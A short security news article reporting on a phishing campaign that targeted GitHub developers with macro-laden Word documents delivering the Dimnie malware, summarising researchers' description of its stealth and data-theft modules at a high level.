This Sophisticated Malware Attack Targets Open Source Developers

In the past few months, the developers who publish their code on the GitHub are targeted in an attack campaign which uses a very little-known but potent malware.

These attacks started in the January and have consisted of malicious emails especifically crafted to attract attention of developers, such as the requests for help with development projects and other offers of payment for programming jobs.

These emails had .gz attachments which contained the Word documents with some malicious macro code attached. If this is allowed to execute, macro code executed in a PowerShell script which reached out to a remote server and then downloaded a malware program known as the Dimnie.

According to the researchers from Palo Alto Networks, the Dimnie has been around since 2014, and has flown under radar until now as it is primarily targeted towards users from the Russia.

This malware uses stealthy techniques to make its malicious traffic blend into the normal user activity. It usually generates requests which appear to be directed to Google like domain names, but which are actually sent to an attacker’s IP address.

The Dimnie is able to download some additional malicious modules which are injected directly into memory of the legitimate Windows processes. The modules leave no traces on the disk, which makes their analysis and detection more complicated, Palo Alto researchers said in this blog post.

There are some separate modules for the screen grabbing, keylogging, interacting with smart cards attached to computer and more. There is also a self-destruct module which wipes all files from the system drive in order to destroy the traces of the malware’s presence.

Data stolen from an infected computer is encrypted and appended to image headers in an attempt to bypass intrusion prevention systems.

Developers can be valuable targets for cyber espionage. Their computers often hold proprietary information and access credentials for their employers’ networks and systems.

 

Related posts

ANY.RUN Discovers Tricky Phishing Attack Using Fake CAPTCHA

Kia Dealer Portal Vulnerability Risked Millions of Cars

Latest Octo Malware Variant Mimics Popular Apps Like NordVPN, Chrome